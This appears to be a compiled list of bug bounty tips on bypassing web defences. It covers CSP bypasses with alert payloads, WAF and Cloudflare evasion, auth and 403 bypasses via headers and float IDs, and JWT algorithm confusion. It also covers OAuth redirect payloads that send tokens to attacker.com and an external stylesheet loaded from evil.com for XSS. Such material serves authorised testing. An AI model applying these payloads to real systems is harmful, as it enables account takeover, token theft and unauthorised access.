Bypasses

• ​It's possible to bypass #CSP with the following : #JSONP: <script src="https://trustedsite/jsonp?callback=payload"> #AngularJS <script src="https://trustedsite/angularjs/1.1.3/angularjs.min.js"> <div ng-app ng-csp id=p ng-click=$event.view.alert(1)>​

• ​Encountered with AWS WAF? Just add "<!" (without quotes) before your payload and bypass that WAF. :) eg: <!alert(1) #BugBounty #bugbountytip #bugbountytips​

• ​If the target is using @Cloudflare , dig in their DNS records and search for the origins IP address. If you attack the application directly by his IP’s cloudflare WAF will not be there.​

• ​Here is my obfuscated payload. It bypasses lots of WAF, including CloudFlare iirc. iFrame with javascript URI payload. Line feeds [CRLF] obfuscate it.​

• ​Let's say they use this CSP rule to restrict framing: content-security-policy: frame-ancestors 'self' https://*.foo.foo:* Check if http://foo.foo is claimed. https://blog.ibrahimdraidia.com/bypass-csp-framing-restriction-rule-olx/ … #bugbountytip​

• ​Testing authorization/access controls with a numeric ID? Try decimals/floats and round to the number you want to access. Example: admin role ID is 1 Try to set your ID to 0.9 and it may bypass the auth check as system will round up after auth check #bugbountytip #bugbounty​

• ​When hacking webapps, I have a little bag of bugs I always check for that are commonly missed. Here's one: I check if signing up with the same username as a deleted account will give me access to their old data.​

• CSP Bypass, script-src 'self' data: - https://twitter.com/404death/status/1191222237782659072​

• ​Want to bypass file extension restriction ? try HTTP Parameter Pollution on the filename parameter.

• ​I just happened to be able to bypass a 2FA in place during a recent engagement. And this was how I did it. #bugbountyTips #pentestTips Last /setup/ endpoint was by attacker while the first one is as victim.​

  • ​

• OTP bypass - https://twitter.com/HackerHumble​

• ​sometimes you find those PATHs that forwards to a login page & you can't see the content inside them. (ex: /path/to/secret --> Google login)​

• Let's say they use this CSP rule to restrict framing: content-security-policy: frame-ancestors 'self' https://*.foo.foo:* Check if http://foo.foo is claimed. https://blog.ibrahimdraidia.com/bypass-csp-framing-restriction-rule-olx/ #bugbountytip​

Cloudfront Bypass -

403 Bypass:

​

Tool -

• ​https://github.com/lobuhi/byp4xx​

• ​h​ttps://github.com/Raywando/4xxbypass​

• ​https://github.com/sting8k/BurpSuite_403Bypasser​

​

• ​if “origin” header not work, try with “x-[org name]-origin”, same think for all headers!! e.g x-uber-origin, x-uber-host,..etc​

• ​#bugbounty I Was able to bypass the Filter on OAUTH through FUZZ With URL-Encode Chars , Found that Website Add / before %5b when redirect the token Example : target/oauth?redirect_uri=http://attacker.com%https://t.co/QSv7Vm2STd Redirect Token to : http://Attacker.com/%5b.target.comrget.com?token=…...​

• ​Had some recent success using untranslatable Unicode in place of a "?" when attacking URL parsers for SSRF/OAuth issues.​

  ​What worked was... \udfff -> � -> ?​

  ​Therefore... {"redirectUri":"https://attacker\[email protected][victim]/"}​

  ​Equals... Location: https://[email protected][victim]/​

• ​JWT Token Bypasses #2:​

  1. ​Capture the JWT token.​

  2. ​If the algorithm is RS256 change to HS256 and sign the token with the public key (which you can get by visiting jwks Uri / mostly it will be the public key from the site's https certificate) (1/2)​

  ​

• ​Access control vulnerabilities with blocked access can be bypassed by adding the X-Original-URL header. POST /admin/deleteUser HTTP/1.1 -> 403 POST / HTTP/1.1 X-Original-URL: /admin/deleteUser -> 200OK Bypass Success! #bugbounty #bu​gbountytip​

• Price Manipulation -

• ​

​{“id”:111} --> 401 Unauthriozied {“id”:{“id”:111}} --> 200 OK​

​POST /api/get_profile Content-Type: application/json {“user_id”:,”user_id”:}​

​GET /api_v1/messages?user_id=VICTIM_ID --> 401​

​GET /api_v1/messages?user_id=attack&user_id=VICTIM --> 200 OK​

• ​How to find authentication bypass vulnerabilities. Focus. I Added headers.​

  ​Request GET /delete?user=test HTTP/1.1 Response HTTP/1.1 401 Unauthorized​

  ​Reqeust GET /delete?user=test HTTP/1.1 X-Custom-IP-Authorization: 127.0.0.1 Response HTTP/1.1 302 Found​

• CSP - So: Site allows external '.css' stylesheets? Inject your XSS on your local 'style.css' an call it from external "<svg><link href=//evil.com/style.css>" XSS will be injected in the html! (CSP it's on? but no style-src?) so hit the box dude! #bugbounty #infosec​

• ​

• ​CSP - Hates CSP? Me too I found HTML Injection in Bugcrowd Private (can't trigger script because of CSP). Staff change state to P5 (Content Spoofing).​

  ​But I can raise it again to P3 (Iframe Injection) and Triaged.​

  ​<iframe src= blocked by CSP​

  ​Solution:​

  ​<iframe srcdoc=​

​